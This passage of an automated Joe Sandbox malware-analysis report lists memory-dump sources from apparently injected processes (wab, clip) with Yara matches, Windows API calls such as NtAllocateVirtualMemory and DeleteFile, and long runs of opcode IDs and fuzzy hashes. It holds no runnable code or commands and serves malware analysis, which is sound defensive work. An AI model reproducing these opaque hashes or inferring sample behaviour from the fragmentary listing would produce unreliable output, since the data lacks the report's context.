                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5671053a15b8cdc1670345f80092fb507042144ccb06b17881739418cb3080d
                                                  • Instruction ID: 9d5a9db08944a7eaba1ea4c8405d5ca104d65fe9b8378d835a228926d3e98ba1
                                                  • Opcode Fuzzy Hash: e5671053a15b8cdc1670345f80092fb507042144ccb06b17881739418cb3080d
                                                  • Instruction Fuzzy Hash: D690023120150402D1007598944C686004547E0311F99D012B5024515EC66989E16531
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa22bb9d55ca59255262bb259ad64cf617c30677c8080232eb960ab97ef7d0b4
                                                  • Instruction ID: fb6e2707a2baba55fb0fbf3197f1ad0c867a2bf109f78ce26e7d404461c1ed91
                                                  • Opcode Fuzzy Hash: fa22bb9d55ca59255262bb259ad64cf617c30677c8080232eb960ab97ef7d0b4
                                                  • Instruction Fuzzy Hash: 2A90027120150402D14071588448786004547D0311F99C012B5064514E865D8EE56A65
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88bb82ef97eecaefb54bd32e146e30db4d944f63282fb4d2ac022bcd0bbb2865
                                                  • Instruction ID: f0c786427eab8d56e25e9e813bcec77204b563e6d973569139937ac9e64c7d94
                                                  • Opcode Fuzzy Hash: 88bb82ef97eecaefb54bd32e146e30db4d944f63282fb4d2ac022bcd0bbb2865
                                                  • Instruction Fuzzy Hash: 4190023120190402D1007158884C787004547D0312F99C012B5164515E8669C9E16931
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.1879835691.00000000224D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224D0000, based on PE: true
                                                  • Associated: 00000012.00000002.1879835691.00000000225F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.00000000225FD000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.1879835691.000000002266E000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_224d0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: a90e2c9c3259625dd7490c76a6cc1e5792550dd3def2739c0c3ac5a1acab6203
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 06AD00AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1809432291.0000000006ACC000.00000004.00000020.00020000.00000000.sdmp, Offset: 06ACC000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_6acc000_wab.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable
                                                  • String ID: |d@$|d@
                                                  • API String ID: 3104724169-2026124874
                                                  • Opcode ID: 3f034c1101de0a1d2b1616eb3062e80b07f31a93c078f49006696c62da65b2e1
                                                  • Instruction ID: d0730181e3f8f44ab456f41b5ae635b16afc4ac53b0df64b6e96b766022e49d8
                                                  • Opcode Fuzzy Hash: 3f034c1101de0a1d2b1616eb3062e80b07f31a93c078f49006696c62da65b2e1
                                                  • Instruction Fuzzy Hash: CE31D271A80311DFDBA5BF64EE05B2977B0FB48760F12013AE817BB2E0DB344850DA98

                                                  Execution Graph

                                                  Execution Coverage:3.2%
                                                  Dynamic/Decrypted Code Coverage:3.8%
                                                  Signature Coverage:1.9%
                                                  Total number of Nodes:528
                                                  Total number of Limit Nodes:80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "$#$%EG$*$.$0$6h$=$Fr$I$R$X$a$c$c8$iH$lL$o$q$9$G$P$U$|$~
                                                  • API String ID: 0-4189397141
                                                  • Opcode ID: cf2650882523abe8303c401d9fae68754a68062c4c01f321a870ce308f8d12b9
                                                  • Instruction ID: 560a973c03574f6dab37dc912ea9c78a31a89b82607598cb58acb3b4d4863aa2
                                                  • Opcode Fuzzy Hash: cf2650882523abe8303c401d9fae68754a68062c4c01f321a870ce308f8d12b9
                                                  • Instruction Fuzzy Hash: E342B1B4D45268CFEB24CF44C9A4BEDBBB2BB45308F1081D9C4196B280D7B95AC5CF84
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 021BB914
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 021BB94F
                                                  • FindClose.KERNELBASE(?), ref: 021BB95A
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: 0a8f3265f11616ba5fd090bd354dd2a31919c513122e96933fc58942e3bf41a1
                                                  • Instruction ID: e572660caf239d9abe958ec6c6408c0eac305cefdb19a07405b43d74859b9e53
                                                  • Opcode Fuzzy Hash: 0a8f3265f11616ba5fd090bd354dd2a31919c513122e96933fc58942e3bf41a1
                                                  • Instruction Fuzzy Hash: 11315CB5980308AEDB61DFA4CC85FEE777C9F44709F104598F959A7180DB70AB858BA0
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 021C7823
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 1fc552f3599d3cd8c195fa7953c462f38eb244cdd26257c0c67ab286454c148c
                                                  • Instruction ID: fff573924dc5f12833d1beabd363d26fe1e52fb595b0d24520b09f3084efde6e
                                                  • Opcode Fuzzy Hash: 1fc552f3599d3cd8c195fa7953c462f38eb244cdd26257c0c67ab286454c148c
                                                  • Instruction Fuzzy Hash: 7431A3B5A41609AFCB04DF99D881EDFB7F9AF8C314F108219F919A3240D770A951CFA5
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 021C796B
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e2446637bc65172a803c8ab91935c505186b4010a65a70dda7ace577cf17de04
                                                  • Instruction ID: 9b651bbd690e1d6969a434aed4598f54620b2384cd8b366163399d8f5ca33538
                                                  • Opcode Fuzzy Hash: e2446637bc65172a803c8ab91935c505186b4010a65a70dda7ace577cf17de04
                                                  • Instruction Fuzzy Hash: A231B5B5A40609AFCB14DF99D881EEFB7B9AF8C314F118219FD19A7240D770A8118FA4
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(021B137E,?,021C67A7,00000000,00000004,00003000,?,?,?,?,?,021C67A7,021B137E,021C67A7,00000000), ref: 021C7C2D
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e56df03c9cb920b1f51dc70473fe90544d1999a5617db69a811e759821e408e5
                                                  • Instruction ID: 361921b9a6c13528dc20c60b35a8b10caa197efb645b4b63d48307c64c408114
                                                  • Opcode Fuzzy Hash: e56df03c9cb920b1f51dc70473fe90544d1999a5617db69a811e759821e408e5
                                                  • Instruction Fuzzy Hash: E821F8B9A40208AFDB14DF59DC81FAFB7A9EF88310F108109FD09A7280D771A911CFA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 53fc4afead111232fdc41d115ca04acb48d29e3b04916dd05257178245b90efb
                                                  • Instruction ID: fa8ceb321302ac22aea80bc7bc4e9eb8043f24806dc694a4f316f314281b63bd
                                                  • Opcode Fuzzy Hash: 53fc4afead111232fdc41d115ca04acb48d29e3b04916dd05257178245b90efb
                                                  • Instruction Fuzzy Hash: 3A01CB7AA80204BFD220EA68DC42FABB7ADDB84310F004509FA08A7180DBB069018FA1
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 021C7A54
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                                                  • Instruction ID: b9fa37bac97201bc5c5299419a904fb0dc9b7c36b2bd3a4aa9a4d2c482c6cec7
                                                  • Opcode Fuzzy Hash: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                                                  • Instruction Fuzzy Hash: 9BE0467A2406047FD620AB6ACC41FDBB7AEDBC9760F818419FA08A7241C671B9108EB0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51eef8b17505e3968bf2cdd8125458e71e4dc0d447606de87dd136852227c961
                                                  • Instruction ID: ec215133f410541d036fac19ef63a89ffdf26fe51f2a6b0ffbf4af64357e553d
                                                  • Opcode Fuzzy Hash: 51eef8b17505e3968bf2cdd8125458e71e4dc0d447606de87dd136852227c961
                                                  • Instruction Fuzzy Hash: F790027560650502F104715C851470610058BD5215F65E411A4435568D8795DA5165A2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: aebab1183cd6bf45595491687903845c44c7d9f6223dd255b939eb982da766d2
                                                  • Instruction ID: 94a0e1cb76dd1e091663b8167a2e72d16df021b2fd2cdebcc9132829ae64ee2a
                                                  • Opcode Fuzzy Hash: aebab1183cd6bf45595491687903845c44c7d9f6223dd255b939eb982da766d2
                                                  • Instruction Fuzzy Hash: D49002A5602501426144715C880440660059BE6315395E115A4565560C8618D9559269
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5276c14133b8f50ee676f98e326e767f12933a2f5328b6595f11798667f0afa4
                                                  • Instruction ID: fff02aa03c9ef86545a758c0f04f4c8bf992c6bb5f91bc262fbcaad325fe3d15
                                                  • Opcode Fuzzy Hash: 5276c14133b8f50ee676f98e326e767f12933a2f5328b6595f11798667f0afa4
                                                  • Instruction Fuzzy Hash: DF90026524240902F144715CC4147070006CBD5615F55E011A4035554D8616DA6566B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 60edd554fa4603b3b9262756c5d17bea9968d5ef4401d7a4293677687825c347
                                                  • Instruction ID: 79c9ea7de480b19a9fb381b8a3697f966aa87f1729989830c1404c7d548cdff3
                                                  • Opcode Fuzzy Hash: 60edd554fa4603b3b9262756c5d17bea9968d5ef4401d7a4293677687825c347
                                                  • Instruction Fuzzy Hash: 7790027560680112B144715C888454640059BE5315B55E011E4435554C8A14DA565361
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1e12fb358b09db8b168c23e8d23e87d2e9643aed344933f3ef2c189b65f354e9
                                                  • Instruction ID: ad9c3ccb3ec8411c25bc50399cc400420bae617ad32e66c488135f55cb593a53
                                                  • Opcode Fuzzy Hash: 1e12fb358b09db8b168c23e8d23e87d2e9643aed344933f3ef2c189b65f354e9
                                                  • Instruction Fuzzy Hash: E790027520248902F114715CC40474A00058BD5315F59E411A8435658D8695D9917121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5b7e9314d4a07e303f1e46f053d95af3acd6b5f9ed6d0bf21c229778d66d32a0
                                                  • Instruction ID: 3a6b4d90d721d4c838830dcb7b3a6dad5993384007d3b72919db3ea1e9f2072c
                                                  • Opcode Fuzzy Hash: 5b7e9314d4a07e303f1e46f053d95af3acd6b5f9ed6d0bf21c229778d66d32a0
                                                  • Instruction Fuzzy Hash: B290027520240942F104715C8404B4600058BE5315F55E016A4135654D8615D9517521
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ca6c8a61a301853162833baa641c0fb99c943045c678eb39a9be72b553b59613
                                                  • Instruction ID: 9cf6daef2853f8c0a17b9d588509e69bbd261d8df24176a7b7818953cfc13259
                                                  • Opcode Fuzzy Hash: ca6c8a61a301853162833baa641c0fb99c943045c678eb39a9be72b553b59613
                                                  • Instruction Fuzzy Hash: B590027520240502F104759C940864600058BE5315F55F011A9035555EC665D9916131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1665eec6d605b3bff5f10722eddc53f2e681cee4da8e258cc91039c6af3fd4d3
                                                  • Instruction ID: 80f571c26b814d6ea412ee5e0c570637232fa17d14ccf5b3ea4fbaf50bf67fb3
                                                  • Opcode Fuzzy Hash: 1665eec6d605b3bff5f10722eddc53f2e681cee4da8e258cc91039c6af3fd4d3
                                                  • Instruction Fuzzy Hash: A390026530240103F144715C94186064005DBE6315F55F011E4425554CD915D9565222
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 18090f1cfd0d4571d4a149e80515b216b012f5bcdd536e5657aa9b5d85665f88
                                                  • Instruction ID: 9543b36fe7376116455394bfbf01e8fdb41db81f4ca8c9cd42e31f71bf523543
                                                  • Opcode Fuzzy Hash: 18090f1cfd0d4571d4a149e80515b216b012f5bcdd536e5657aa9b5d85665f88
                                                  • Instruction Fuzzy Hash: 1E90026D21340102F184715C940860A00058BD6216F95F415A4026558CC915D9695321
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 242040dbba5c5b49d85b8d54b3a8a6113b81923e553c6bc302511760655c7919
                                                  • Instruction ID: dfb89218ec2ae6aeb285d29e30c04c265b3c5ece47abfc960eb7eedcae49c1fc
                                                  • Opcode Fuzzy Hash: 242040dbba5c5b49d85b8d54b3a8a6113b81923e553c6bc302511760655c7919
                                                  • Instruction Fuzzy Hash: 4190027520240513F115715C850470700098BD5255F95E412A4435558D9656DA52A121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a67d017f6d28e3f81507c0b27864fdb8952bf069d8de97b3b0e92bf54fca23c1
                                                  • Instruction ID: 9a13144498df42eb02a2a2e5a12af418b3981387debdea691f11620f7dfbeca3
                                                  • Opcode Fuzzy Hash: a67d017f6d28e3f81507c0b27864fdb8952bf069d8de97b3b0e92bf54fca23c1
                                                  • Instruction Fuzzy Hash: 45900265243442527549B15C840450740069BE5255795E012A5425950C8526E956D621
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2b081f0c0f5834b256be8cf65d4a3ab8735f046ba10edbce9d602a8736e81417
                                                  • Instruction ID: 9a25428c9dc74a708b5c8d478bd7a59c5c4d665f6b1779d9b151a19d3754ce6e
                                                  • Opcode Fuzzy Hash: 2b081f0c0f5834b256be8cf65d4a3ab8735f046ba10edbce9d602a8736e81417
                                                  • Instruction Fuzzy Hash: F190026560240602F105715C8404616000A8BD5255F95E022A5035555ECA25DA92A131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 11c550e5ad7f6949d2e3005c73672ef786a2a195c7a49e5c843a5ff8510faaf3
                                                  • Instruction ID: 109872819aeca188bc0c3a3766c3f2f2aad9bb70a459bf379c45d630add03dd0
                                                  • Opcode Fuzzy Hash: 11c550e5ad7f6949d2e3005c73672ef786a2a195c7a49e5c843a5ff8510faaf3
                                                  • Instruction Fuzzy Hash: 399002A520280503F144755C880460700058BD5316F55E011A6075555E8A29DD516135
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a961bc11affbb904725fa273ca93b46d7244300ba70bf271dcb0a6806b029522
                                                  • Instruction ID: 411cc513c3a26273eb15b69b17dda5946108fa777e4e052be6ca5c70779a9770
                                                  • Opcode Fuzzy Hash: a961bc11affbb904725fa273ca93b46d7244300ba70bf271dcb0a6806b029522
                                                  • Instruction Fuzzy Hash: 629002A534240542F104715C8414B060005CBE6315F55E015E5075554D8619DD526126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8a52fb41d6ffa9b7e2145051f64ab5e45c31f85bdbb029158807d805b1d0529e
                                                  • Instruction ID: 3df848fc3b61dc925706a2f80ef99cc6346414faa67668b556eab344397b4ae5
                                                  • Opcode Fuzzy Hash: 8a52fb41d6ffa9b7e2145051f64ab5e45c31f85bdbb029158807d805b1d0529e
